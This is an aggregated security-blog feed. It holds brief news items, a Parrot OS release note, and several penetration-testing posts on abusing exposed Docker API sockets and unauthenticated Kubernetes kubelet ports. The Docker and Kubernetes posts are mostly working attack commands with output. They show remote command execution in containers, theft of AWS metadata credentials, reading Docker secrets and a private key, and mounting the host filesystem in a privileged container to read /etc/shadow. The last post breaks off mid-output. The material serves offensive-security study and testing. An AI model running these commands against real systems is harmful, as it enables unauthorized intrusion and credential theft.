Application News – Application Security Weekly #49

    Three UK customer details exposed in homepage blunder, Microsoft cloud services see global authentication outage, the age of surveillance capitalism, the rise of DevXOps, and much more! News Bugs, Breaches, and More! 1.) Three UK customer details exposed in homepage blunder 2.) Microsoft cloud services see global authentication outage 3.) Microsoft Exchange vulnerable to ‘PrivExchange’ zero-day […]
The post Application News – Application Security Weekly #49 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/K6Jx2mXiVsg/

Abusing Docker API | Socket

Notes on abusing open Docker socketsThis wont cover breaking out of docker containersPorts: usually 2375 & 2376 but can be anythingRefs:https://blog.sourcerer.io/a-crash-course-on-docker-learn-to-swim-with-the-big-fish-6ff25e8958b0https://www.slideshare.net/BorgHan/hacking-docker-the-easy-wayhttps://blog.secureideas.com/2018/05/escaping-the-whale-things-you-probably-shouldnt-do-with-docker-part-1.htmlhttps://blog.secureideas.com/2018/08/escaping-the-whale-things-you-probably-shouldnt-do-with-docker-part-2.htmlhttps://infoslack.com/devops/exploring-docker-remote-apihttps://www.blackhat.com/docs/us-17/thursday/us-17-Cherny-Well-That-Escalated-Quickly-How-Abusing-The-Docker-API-Led-To-Remote-Code-Execution-Same-Origin-Bypass-And-Persistence_wp.pdfhttps://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/https://cert.litnet.lt/2016/11/owning-system-through-an-exposed-docker-engine/https://medium.com/@riccardo.ancarani94/attacking-docker-exposed-api-3e01ffc3c124https://www.exploit-db.com/exploits/42356https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/docker_daemon_tcp.rbhttp://blog.nibblesec.org/2014/09/abusing-dockers-remote-apis.htmlhttps://www.prodefence.org/knock-knock-docker-will-you-let-me-in-open-api-abuse-in-docker-containers/https://blog.ropnop.com/plundering-docker-images/Enable docker socket (Create practice locations)https://success.docker.com/article/how-do-i-enable-the-remote-api-for-dockerdHaving the docker API | socket exposed is essentially granting root to any of the containers on the systemThe daemon listens on unix:///var/run/docker.sock but you can bind Docker to another host/port or a Unix socket.The docker socket  is the socket the Docker daemon listens on by default and it can be used to communicate with the daemon from within a container, or if configured, outside the container against the host running docker.All the docker socket magic is happening via the docker API. For example if we wanted to spin up an nginx container we’d do the below:Create a nginx containerThe following command uses curl to send the {“Image”:”nginx”} payload to the /containers/create endpoint of the Docker daemon through the unix socket. This will create a container based on Nginx and return its ID.$ curl -XPOST –unix-socket /var/run/docker.sock -d ‘{“Image":"nginx"}’ -H ‘Content-Type: application/json’ http://localhost/containers/create{"Id":"fcb65c6147efb862d5ea3a2ef20e793c52f0fafa3eb04e4292cb4784c5777d65","Warnings":null}Start the container $ curl -XPOST –unix-socket /var/run/docker.sock http://localhost/containers/fcb65c6147efb862d5ea3a2ef20e793c52f0fafa3eb04e4292cb4784c5777d65/startAs mentioned above you can also have the docker socket listen on a TCP portYou can validate it’s docker by hitting it with a version request $ curl -s http://open.docker.socket:2375/version | jq{  "Version": "1.13.1",  "ApiVersion": "1.26",  "MinAPIVersion": "1.12",  "GitCommit": "07f3374/1.13.1",  "GoVersion": "go1.9.4",  "Os": "linux",  "Arch": "amd64",  "KernelVersion": "3.10.0-514.26.2.el7.x86_64",  "BuildTime": "2018-12-07T16:13:51.683697055+00:00",  "PkgVersion": "docker-1.13.1-88.git07f3374.el7.centos.x86_64"} or with the docker clientdocker -H  open.docker.socket:2375 version Server: Engine:  Version:          1.13.1  API version:      1.26 (minimum version 1.12)  Go version:       go1.9.4  Git commit:       07f3374/1.13.1  Built:            Fri Dec  7 16:13:51 2018  OS/Arch:          linux/amd64  Experimental:     falseThis is basically a shell into the containerGet a list of running containers with the ps commanddocker -H  open.docker.socket:2375 psCONTAINER ID        IMAGE                                               COMMAND                  CREATED             STATUS              PORTS                                           NAMES72cd30d28e5c        gogs/gogs                                           "/app/gogs/docker/st…"   5 days ago          Up 5 days           0.0.0.0:3000->3000/tcp, 0.0.0.0:10022->22/tcp   gogsb522a9034b30        jdk1.8                                              "/bin/bash"              5 days ago          Up 5 days                                                           myjdk80f5947860c17        centos/mysql-57-centos7                             "container-entrypoin…"   8 days ago          Up 8 days           0.0.0.0:3306->3306/tcp                          mysql3965c004c7a7        192.168.32.134:5000/tensquare_config:1.0-SNAPSHOT   "java -jar /app.jar"     8 days ago          Up 8 days           0.0.0.0:12000->12000/tcp                        config3f466b754971        42cb59080921                                        "/bin/bash"              8 days ago          Up 8 days                                                           jdk86499013fdc2d        registry                                            "/entrypoint.sh /etc…"   8 days ago          Up 8 days           0.0.0.0:5000->5000/tcp                          registryExec into one of the containersdocker -H  open.docker.socket:2375 exec -it mysql /bin/bashbash-4.2$ whoamimysqlOther commandsAre there some stopped containers?docker -H open.docker.socket:2375 ps -aWhat are the images pulled on the host machine?docker -H open.docker.socket:2375 imagesI’ve frequently not been able to get the docker client to work well when it comes to the exec command but you can still code exec in the container with the API.  The example below is using curl to interact with the API over https (if enabled). to create and exec job, set up the variable to receive the out put and then start the exec so you can get the output.Using curl to hit the APISometimes you’ll see 2376 up for the TLS endpoint.  I haven’t been able to connect to it with the docker client but you can with curl no problem to hit the docker API.Docker socket to metadata URLhttps://docs.docker.com/engine/api/v1.37/#operation/ContainerExecBelow is an example of hitting the internal AWS metadata URL and getting the outputlist containers:curl –insecure https://tls-opendocker.socker:2376/containers/json | jq [  {    "Id": "f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668",    "Names": [      "/docker_snip_1"    ],    "Image": "dotnetify",    "ImageID": "sha256:23b66a91f928ea6a49bce1be4eabedbafd41c5dfa4e76c1a94062590e54550ca",    "Command": "cmd /S /C ‘dotnet netify-temp.dll’",    "Created": 1541018555,    "Ports": [      {        "IP": "0.0.0.0",        "PrivatePort": 443,        "PublicPort": 50278,—SNIP—List processes in a container:curl –insecure https://tls-opendocker.socker:2376/containers/f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668/top | jq  {  "Processes": [    [      "smss.exe",      "7868",      "00:00:00.062",      "225.3kB"    ],    [      "csrss.exe",      "10980",      "00:00:00.859",      "421.9kB"    ],    [      "wininit.exe",      "10536",      "00:00:00.078",      "606.2kB"    ],    [      "services.exe",      "10768",      "00:00:00.687",      "1.208MB"    ],    [      "lsass.exe",      "10416",      "00:00:36.000",      "4.325MB"    ], —SNIP—Set up and exec job to hit the metadata URL:curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/blissful_engelbart/exec -d ‘{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "wget -qO- http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"]}'{"Id":"4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55"}Get the output:curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55/start -d ‘{}'{  "Code" : "Success",  "LastUpdated" : "2019-01-29T20:12:58Z",  "Type" : "AWS-HMAC",  "AccessKeyId" : "ASIATRSNIP",  "SecretAccessKey" : "CD6/h/egYHmYUSNIPSNIPSNIPSNIPSNIP",  "Token" : "FQoGZXIvYXdzEB4aDCQSM0rRV/SNIPSNIPSNIP",  "Expiration" : "2019-01-30T02:43:34Z"} Docker secrets relevant reading https://docs.docker.com/engine/swarm/secrets/ list secrets (no secrets/swarm not set up) curl -s –insecure https://tls-opendocker.socket:2376/secrets | jq { "message": "This node is not a swarm manager. Use \"docker swarm init\" or \"docker swarm join\" to connect this node to swarm and try again."} list secrets (they exist) $ curl -s –insecure https://tls-opendocker.socket:2376/secrets | jq [  {    "ID": "9h3useaicj3tr465ejg2koud5",    "Version": {      "Index": 21    },    "CreatedAt": "2018-07-06T10:19:50.677702428Z",    "UpdatedAt": "2018-07-06T10:19:50.677702428Z",    "Spec": {      "Name": "registry-key.key",      "Labels": {} }},Check what is mountedcurl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d ‘{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "mount"]}’ {"Id":"7fe5c7d9c2c56c2b2e6c6a1efe1c757a6da1cd045d9b328ea9512101f72e43aa"}Get the output by starting the execcurl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/7fe5c7d9c2c56c2b2e6c6a1efe1c757a6da1cd045d9b328ea9512101f72e43aa/start -d ‘{}’overlay on / type overlay proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755)devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)sysfs on /sys type sysfs (ro,nosuid,nodev,noexec,relatime)—SNIP—mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)/dev/sda2 on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro,data=ordered)/dev/sda2 on /etc/hostname type ext4 (rw,relatime,errors=remount-ro,data=ordered)/dev/sda2 on /etc/hosts type ext4 (rw,relatime,errors=remount-ro,data=ordered)shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)/dev/sda2 on /var/lib/registry type ext4 (rw,relatime,errors=remount-ro,data=ordered)tmpfs on /run/secrets/registry-cert.crt type tmpfs (ro,relatime)tmpfs on /run/secrets/htpasswd type tmpfs (ro,relatime)tmpfs on /run/secrets/registry-key.key type tmpfs (ro,relatime)—SNIP—Cat the mounted secretcurl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d ‘{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /run/secrets/registry-key.key"]}’ {"Id":"3a11aeaf81b7f343e7f4ddabb409ad1eb6024141a2cfd409e5e56b4f221a7c30"} curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/3a11aeaf81b7f343e7f4ddabb409ad1eb6024141a2cfd409e5e56b4f221a7c30/start -d ‘{}’ —–BEGIN RSA PRIVATE KEY—–MIIJKAIBAAKCAgEA1A/ptrezfxUlupPgKd/kAki4UlKSfMGVjD6GnJyqS0ySHiz0—SNIP—If you have secrets, it’s also worth checking out services in case they are adding secrets via environment variables curl -s –insecure https://tls-opendocker.socket:2376/services | jq [{    "ID": "amxjs243dzmlc8vgukxdsx57y",    "Version": {      "Index": 6417    },    "CreatedAt": "2018-04-16T19:51:20.489851317Z",    "UpdatedAt": "2018-12-07T13:44:36.6869673Z",    "Spec": {      "Name": "app_REMOVED",      "Labels": {},      "TaskTemplate": {        "ContainerSpec": {          "Image": "dpage/pgadmin4:latest@sha256:5b8631d35db5514d173ad2051e6fc6761b4be6c666105f968894509c5255c739",          "Env": [            "PGADMIN_DEFAULT_EMAIL=REMOVED            "PGADMIN_DEFAULT_PASSWORD=REMOVED"          ],          "Isolation": "default" Creating a container that has mounted the host file systemcurl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket2376/containers/create?name=test -d ‘{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}'{"Id":"0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192","Warnings":null}curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/start?name=testRead something from the hostcurl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/exec -d ‘{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /mnt/etc/shadow"]}'{"Id":"140e09471b157aa222a5c8783028524540ab5a55713cbfcb195e6d5e9d8079c6"}curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/140e09471b157aa222a5c8783028524540ab5a55713cbfcb195e6d5e9d8079c6/start -d ‘{}’root:$6$THEPASSWORDHASHWUZHERE:17717:0:99999:7:::daemon:*:17001:0:99999:7:::bin:*:17001:0:99999:7:::sys:*:17001:0:99999:7:::sync:*:17001:0:99999:7:::games:*:17001:0:99999:7:::CleanupStop the containercurl –insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/stopdelete stopped containerscurl –insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/prune

Link: http://carnal0wnage.attackresearch.com/2019/02/abusing-docker-api-socket.html

Parrot Security 4.5 – Security GNU/Linux Distribution Designed with Cloud Pentesting and IoT Security in Mind

Parrot 4.5 is officially released, and there are some major changes under the hood, powered by the long-term supported Linux 4.19 kernel series, preparing the project for the upcoming Parrot 5.0 LTS release. For future releases, Parrot Security plans to a support two kernels, stable kernel and a testing kernel.Parrot 4.5 also comes with the latest Metasploit 5.0 penetration testing framework, which introduces major features like new evasion modules, a new search engine, a json-rpc daemon, integrated web services, and support for writting shellcode in C.This release improves the metapackages for developers,  making it a lot easier to set up an advanced development environment for multiple frameworks and programming languages. These include parrot-devel, parrot-devel-tools, and parrot-devel-extra.Parrot 4.5 drops support for 32-bit computersOn the other side, Parrot 4.5 is the first release of the ethical hacking operating system to no longer ship with installation or live images for older, 32-bit only computers. With this, Parrot joins the growing trend of GNU/Linux distributions dropping 32-bit images. However, the developers noted the fact that they will continue to support the 32-bit architecture with updates through the official software repositories for existing users.Better Dev ToolsThere are updates in metapackages for developers, and setting up an advanced development environment for several programming languages and frameworks is now easier than ever:parrot-develIt is pre-installed in Parrot 4.5 and provides the following tools:vscodium – an advanced and extensible text editor.zeal – an offline documentation downloader and browser.git-cola – a graphic client to GIT.meld – a graphic patch inspector.tora – a graphic database frontend compatible with several database backends.These packages are included in the metapackage by using the “Recommends” apt directive, and they can be removed individually without triggering the removal of the whole parrot-devel metapackage.The metapackage also recommends the installation of parrot-devel-tools.sudo apt updatesudo apt install parrot-develparrot-devel-toolsIt is recommended by parrot-devel and pre-installed in Parrot Security. It provides some useful compilers and interpreters for the most used languages and provides the following packages:GCC/G++ – a compiler collection for C, C++ and other languages.python3 – the cpython interpreter for the python 3.6 and 3.7 language.ruby – the official ruby lang interpreter and basic toolkit (includes irb and ri as well).The package also recommends the following packages, that can be safely removed without triggering the removal of the entire parrot-devel-tools metapackage:default-jdk – the latest Java OpenJDK distribution for Java 11 (both JDK and JRE).cython3 – a compiler for the cython language, a strongly-typed dialect of python for efficient code.rust/cargo – the rust compiler and devel tools and its package management system.valac – the vala c compiler.mono-devel – the development tools for the MONO framework, an open source implementation of .net.mono-runtime – the runtime of the MONO framework compatible and interoperable with the latest .net runtime.php-cli – the PHP 7.3 language plus its command line interface and some useful core libraries.perl6 – the PERL 6 interpreter and core libraries.sudo apt updatesudo apt install parrot-devel-tools parrot-devel-extraThe parrot-devel-extra metapackage is a quick way to install many additional development utilities like advanced IDEs, additional languages, debuggers and extra tools.golang – go language compiler and runtimenodejs – node.js frameworknpm – node.js package manageratom – advanced and extensible editor by githubqtcreator – powerful C, C++ and Qt/QML IDE and debugger.kdevelop – advanced general purpose IDE by KDE.edb-debugger – graphical debugger.jad – Java decompiler.nasm – powerful general purpose x86 assembler.radare2 – advanced command line hexadecimal editor.cmake – cross-platform, open-source make system.valgrind – nstrumentation framework for building dynamic analysis tools.devscripts/build-essential – useful development utilities for debian developers/maintainers.sudo apt updatesudo apt install parrot-devel-extraDownload Parrot Security 4.5

Link: http://feedproxy.google.com/~r/PentestTools/~3/xXnhQTKJewU/parrot-security-45-security-gnulinux.html

LinkedIn, MySQL, & Cyber Attacks – Hack Naked News #204

    A flaw in MySQL could allow rogue servers to steal files, a state agency exposes 3TB of data including FBI info, how cybercriminals clean their dirty money, a critical RCE flaw in Linux APT allows remote attackers to hack systems, and how to protect against a new breed of cyber attack! Jason Wood […]
The post LinkedIn, MySQL, & Cyber Attacks – Hack Naked News #204 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/wxbXbYGhYOA/

Kubernetes: unauth kublet API 10250 basic code exec

Unauth API access (10250)Most Kubernetes deployments provide authentication for this port. But it’s still possible to expose it inadvertently and it’s still pretty common to find it exposed via the “insecure API service" option.Everybody who has access to the service kubelet port (10250), even without a certificate, can execute any command inside the container.# /run/%namespace%/%pod_name%/%container_name%example:$ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system/node-exporter-iuwg7/node-exporter" -d "cmd=ls -la /"total 12drwxr-xr-x   13 root     root           148 Aug 26 11:31 .drwxr-xr-x   13 root     root           148 Aug 26 11:31 ..-rwxr-xr-x    1 root     root             0 Aug 26 11:31 .dockerenvdrwxr-xr-x    2 root     root          8192 May  5 22:22 bindrwxr-xr-x    5 root     root           380 Aug 26 11:31 devdrwxr-xr-x    3 root     root           135 Aug 26 11:31 etcdrwxr-xr-x    2 nobody   nogroup          6 Mar 18 16:38 homedrwxr-xr-x    2 root     root             6 Apr 23 11:17 libdr-xr-xr-x  353 root     root             0 Aug 26 07:14 procdrwxr-xr-x    2 root     root             6 Mar 18 16:38 rootdr-xr-xr-x   13 root     root             0 Aug 26 15:12 sysdrwxrwxrwt    2 root     root             6 Mar 18 16:38 tmpdrwxr-xr-x    4 root     root            31 Apr 23 11:17 usrdrwxr-xr-x    5 root     root            41 Aug 26 11:31 varHere is how to get all secrets which container uses (environment variables – commons to see kublet tokens here):$ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system/The list of all pods and containers which were scheduled on the Kubernetes worker node could be retrieved using command below:$ curl -sk https://k8s-node-1:10250/runningpods/ | python -mjson.toolor$ curl –insecure  https://k8s-node-1:10250/runningpods | jqExample 1:curl –insecure  https://1.2.3.4:10250/runningpods | jqOutput:Forbidden (user=system:anonymous, verb=create, resource=nodes, subresource=proxy)Example 2:curl –insecure  https://1.2.3.4:10250/runningpods | jqOutput:UnauthorizedExample 3:curl –insecure  https://1.2.3.4:10250/runningpods | jqOutput:{  "kind": "PodList",  "apiVersion": "v1",  "metadata": {},  "items": [    {      "metadata": {        "name": "kube-dns-5b8bf6c4f4-k5n2g",        "generateName": "kube-dns-5b8bf6c4f4-",        "namespace": "kube-system",        "selfLink": "/api/v1/namespaces/kube-system/pods/kube-dns-5b8bf6c4f4-k5n2g",        "uid": "63438841-e43c-11e8-a104-42010a80038e",        "resourceVersion": "85366060",        "creationTimestamp": "2018-11-09T16:27:44Z",        "labels": {          "k8s-app": "kube-dns",          "pod-template-hash": "1646927090"        },        "annotations": {          "kubernetes.io/config.seen": "2018-11-09T16:27:44.990071791Z",          "kubernetes.io/config.source": "api",          "scheduler.alpha.kubernetes.io/critical-pod": ""        },        "ownerReferences": [          {            "apiVersion": "extensions/v1beta1",            "kind": "ReplicaSet",            "name": "kube-dns-5b8bf6c4f4",            "uid": "633db9d4-e43c-11e8-a104-42010a80038e",            "controller": true          }        ]      },      "spec": {        "volumes": [          {            "name": "kube-dns-config",            "configMap": {              "name": "kube-dns",              "defaultMode": 420            }          },          {            "name": "kube-dns-token-xznw5",            "secret": {              "secretName": "kube-dns-token-xznw5",              "defaultMode": 420            }          }        ],        "containers": [          {            "name": "dnsmasq",            "image": "gcr.io/google-containers/k8s-dns-dnsmasq-nanny-amd64:1.14.10",            "args": [              "-v=2",              "-logtostderr",              "-configDir=/etc/k8s/dns/dnsmasq-nanny",              "-restartDnsmasq=true",              "–",              "-k",              "–cache-size=1000",              "–no-negcache",              "–log-facility=-",              "–server=/cluster.local/127.0.0.1#10053",              "–server=/in-addr.arpa/127.0.0.1#10053",              "–server=/ip6.arpa/127.0.0.1#10053"            ],            "ports": [              {                "name": "dns",                "containerPort": 53,                "protocol": "UDP"              },              {                "name": "dns-tcp",                "containerPort": 53,                "protocol": "TCP"              }            ],            "resources": {              "requests": {                "cpu": "150m",                "memory": "20Mi"              }            },            "volumeMounts": [              {                "name": "kube-dns-config",                "mountPath": "/etc/k8s/dns/dnsmasq-nanny"              },              {                "name": "kube-dns-token-xznw5",                "readOnly": true,                "mountPath": "/var/run/secrets/kubernetes.io/serviceaccount"              }            ],            "livenessProbe": {              "httpGet": {                "path": "/healthcheck/dnsmasq",                "port": 10054,                "scheme": "HTTP"              },              "initialDelaySeconds": 60,              "timeoutSeconds": 5,              "periodSeconds": 10,              "successThreshold": 1,              "failureThreshold": 5            },            "terminationMessagePath": "/dev/termination-log",            "imagePullPolicy": "IfNotPresent"          },        ——–SNIP———With the output of the running pods command you can craft your command to do the code exec$ curl -k -XPOST "https://k8s-node-1:10250/run/as an example:leaves you with:curl -k -XPOST "https://kube-node-here:10250/run/kube-system/kube-dns-5b8bf6c4f4-k5n2g/dnsmasq" -d "cmd=ls -la /"total 35264drwxr-xr-x    1 root     root          4096 Nov  9 16:27 .drwxr-xr-x    1 root     root          4096 Nov  9 16:27 ..-rwxr-xr-x    1 root     root             0 Nov  9 16:27 .dockerenvdrwxr-xr-x    2 root     root          4096 Nov  9 16:27 bindrwxr-xr-x    5 root     root           380 Nov  9 16:27 dev-rwxr-xr-x    1 root     root      36047205 Apr 13  2018 dnsmasq-nannydrwxr-xr-x    1 root     root          4096 Nov  9 16:27 etcdrwxr-xr-x    2 root     root          4096 Jan  9  2018 homedrwxr-xr-x    5 root     root          4096 Nov  9 16:27 libdrwxr-xr-x    5 root     root          4096 Nov  9 16:27 mediadrwxr-xr-x    2 root     root          4096 Jan  9  2018 mntdr-xr-xr-x  125 root     root             0 Nov  9 16:27 procdrwx——    2 root     root          4096 Jan  9  2018 rootdrwxr-xr-x    2 root     root          4096 Jan  9  2018 rundrwxr-xr-x    2 root     root          4096 Nov  9 16:27 sbindrwxr-xr-x    2 root     root          4096 Jan  9  2018 srvdr-xr-xr-x   12 root     root             0 Nov  9 16:27 sysdrwxrwxrwt    1 root     root          4096 Nov  9 17:00 tmpdrwxr-xr-x    7 root     root          4096 Nov  9 16:27 usrdrwxr-xr-x    1 root     root          4096 Nov  9 16:27 var

Link: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250.html

Kubernetes: Kube-Hunter 10255

Below is some sample output that mainly is here to see what open 10255 will give you and look like.  What probably of most interest is the /pods endpointor the /metrics endpointor the /stats endpoint $ ./kube-hunter.pyChoose one of the options below:1. Remote scanning      (scans one or more specific IPs or DNS names)2. Subnet scanning      (scans subnets on all local network interfaces)3. IP range scanning    (scans a given IP range)Your choice: 1Remotes (separated by a ‘,’): 1.2.3.4~ Started~ Discovering Open Kubernetes Services…|| Etcd:|   type: open service|   service: Etcd|_  host: 1.2.3.4:2379|| API Server:|   type: open service|   service: API Server|_  host: 1.2.3.4:443|| API Server:|   type: open service|   service: API Server|_  host: 1.2.3.4:6443|| Etcd Remote version disclosure:|   type: vulnerability|   host: 1.2.3.4:2379|   description:|     Remote version disclosure might give an|_    attacker a valuable data to attack a cluster|| Etcd is accessible using insecure connection (HTTP):|   type: vulnerability|   host: 1.2.3.4:2379|   description:|     Etcd is accessible using HTTP (without|     authorization and authentication), it would allow a|     potential attacker to|     gain access to|_    the etcd|| Kubelet API (readonly):|   type: open service|   service: Kubelet API (readonly)|_  host: 1.2.3.4:10255|| Etcd Remote Read Access Event:|   type: vulnerability|   host: 1.2.3.4:2379|   description:|     Remote read access might expose to an|_    attacker cluster’s possible exploits, secrets and more.|| K8s Version Disclosure:|   type: vulnerability|   host: 1.2.3.4:10255|   description:|     The kubernetes version could be obtained|_    from logs in the /metrics endpoint|| Privileged Container:|   type: vulnerability|   host: 1.2.3.4:10255|   description:|     A Privileged container exist on a node.|     could expose the node/cluster to unwanted root|_    operations|| Cluster Health Disclosure:|   type: vulnerability|   host: 1.2.3.4:10255|   description:|     By accessing the open /healthz handler, an|     attacker could get the cluster health state without|_    authenticating|| Exposed Pods:|   type: vulnerability|   host: 1.2.3.4:10255|   description:|     An attacker could view sensitive information|     about pods that are bound to a Node using|_    the /pods endpoint———-Nodes+————-+—————+| TYPE        | LOCATION      |+————-+—————+| Node/Master | 1.2.3.4    |+————-+—————+Detected Services+———————-+———————+———————-+| SERVICE              | LOCATION            | DESCRIPTION          |+———————-+———————+———————-+| Kubelet API          | 1.2.3.4:10255       | The read-only port   || (readonly)           |                     | on the kubelet       ||                      |                     | serves health        ||                      |                     | probing endpoints,   ||                      |                     | and is relied upon   ||                      |                     | by many kubernetes   ||                      |                     | componenets          |+———————-+———————+———————-+| Etcd                 | 1.2.3.4:2379        | Etcd is a DB that    ||                      |                     | stores cluster’s     ||                      |                     | data, it contains    ||                      |                     | configuration and    ||                      |                     | current state        ||                      |                     | information, and     ||                      |                     | might contain        ||                      |                     | secrets              |+———————-+———————+———————-+| API Server           | 1.2.3.4:6443        | The API server is in ||                      |                     | charge of all        ||                      |                     | operations on the    ||                      |                     | cluster.             |+———————-+———————+———————-+| API Server           | 1.2.3.4:443         | The API server is in ||                      |                     | charge of all        ||                      |                     | operations on the    ||                      |                     | cluster.             |+———————-+———————+———————-+Vulnerabilities+———————+———————-+———————-+———————-+———————-+| LOCATION            | CATEGORY             | VULNERABILITY        | DESCRIPTION          | EVIDENCE             |+———————+———————-+———————-+———————-+———————-+| 1.2.3.4:2379        | Unauthenticated      | Etcd is accessible   | Etcd is accessible   | {“etcdserver":"2.3.8 ||                     | Access               | using insecure       | using HTTP (without  | ","etcdcluster":"2.3 ||                     |                      | connection (HTTP)    | authorization and    | …                  ||                     |                      |                      | authentication), it  |                      ||                     |                      |                      | would allow a        |                      ||                     |                      |                      | potential attacker   |                      ||                     |                      |                      | to                   |                      ||                     |                      |                      |      gain access to  |                      ||                     |                      |                      | the etcd             |                      |+———————+———————-+———————-+———————-+———————-+| 1.2.3.4:2379        | Information          | Etcd Remote version  | Remote version       | {"etcdserver":"2.3.8 ||                     | Disclosure           | disclosure           | disclosure might     | ","etcdcluster":"2.3 ||                     |                      |                      | give an attacker a   | …                  ||                     |                      |                      | valuable data to     |                      ||                     |                      |                      | attack a cluster     |                      |+———————+———————-+———————-+———————-+———————-+| 1.2.3.4:10255       | Information          | K8s Version          | The kubernetes       | v1.5.6-rc17          ||                     | Disclosure           | Disclosure           | version could be     |                      ||                     |                      |                      | obtained from logs   |                      ||                     |                      |                      | in the /metrics      |                      ||                     |                      |                      | endpoint             |                      |+———————+———————-+———————-+———————-+———————-+| 1.2.3.4:10255       | Information          | Exposed Pods         | An attacker could    | count: 68            ||                     | Disclosure           |                      | view sensitive       |                      ||                     |                      |                      | information about    |                      ||                     |                      |                      | pods that are bound  |                      ||                     |                      |                      | to a Node using the  |                      ||                     |                      |                      | /pods endpoint       |                      |+———————+———————-+———————-+———————-+———————-+| 1.2.3.4:10255       | Information          | Cluster Health       | By accessing the     | status: ok           ||                     | Disclosure           | Disclosure           | open /healthz        |                      ||                     |                      |                      | handler, an attacker |                      ||                     |                      |                      | could get the        |                      ||                     |                      |                      | cluster health state |                      ||                     |                      |                      | without              |                      ||                     |                      |                      | authenticating       |                      |+———————+———————-+———————-+———————-+———————-+| 1.2.3.4:2379        | Access Risk          | Etcd Remote Read     | Remote read access   | {"action":"get","nod ||                     |                      | Access Event         | might expose to an   | e":{"dir":true,"node ||                     |                      |                      | attacker cluster’s   | …                  ||                     |                      |                      | possible exploits,   |                      ||                     |                      |                      | secrets and more.    |                      |+———————+———————-+———————-+———————-+———————-+| 1.2.3.4:10255       | Access Risk          | Privileged Container | A Privileged         | pod: node-exporter-  ||                     |                      |                      | container exist on a | 1fmd9-z9685,         ||                     |                      |                      | node. could expose   | containe…          ||                     |                      |                      | the node/cluster to  |                      ||                     |                      |                      | unwanted root        |                      ||                     |                      |                      | operations           |                      |+———————+———————-+———————-+———————-+———————-+

Link: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kube-hunter-10255.html

Kubernetes: unauth kublet API 10250 token theft & kubectl

Kubernetes: unauthenticated kublet API (10250) token theft & kubectl access & execkube-hunter output to get us started: do a curl -s https://k8-node:10250/runningpods/ to get a list of running podsWith that data, you can craft your post request to exec within a pod so we can poke around. Example request:curl -k -XPOST “https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=ls -la /"Output:total 35264drwxr-xr-x    1 root     root          4096 Nov  9 16:27 .drwxr-xr-x    1 root     root          4096 Nov  9 16:27 ..-rwxr-xr-x    1 root     root             0 Nov  9 16:27 .dockerenvdrwxr-xr-x    2 root     root          4096 Nov  9 16:27 bindrwxr-xr-x    5 root     root           380 Nov  9 16:27 dev-rwxr-xr-x    1 root     root      36047205 Apr 13  2018 dnsmasq-nannydrwxr-xr-x    1 root     root          4096 Nov  9 16:27 etcdrwxr-xr-x    2 root     root          4096 Jan  9  2018 homedrwxr-xr-x    5 root     root          4096 Nov  9 16:27 libdrwxr-xr-x    5 root     root          4096 Nov  9 16:27 mediadrwxr-xr-x    2 root     root          4096 Jan  9  2018 mntdr-xr-xr-x  134 root     root             0 Nov  9 16:27 procdrwx——    2 root     root          4096 Jan  9  2018 rootdrwxr-xr-x    2 root     root          4096 Jan  9  2018 rundrwxr-xr-x    2 root     root          4096 Nov  9 16:27 sbindrwxr-xr-x    2 root     root          4096 Jan  9  2018 srvdr-xr-xr-x   12 root     root             0 Dec 19 19:06 sysdrwxrwxrwt    1 root     root          4096 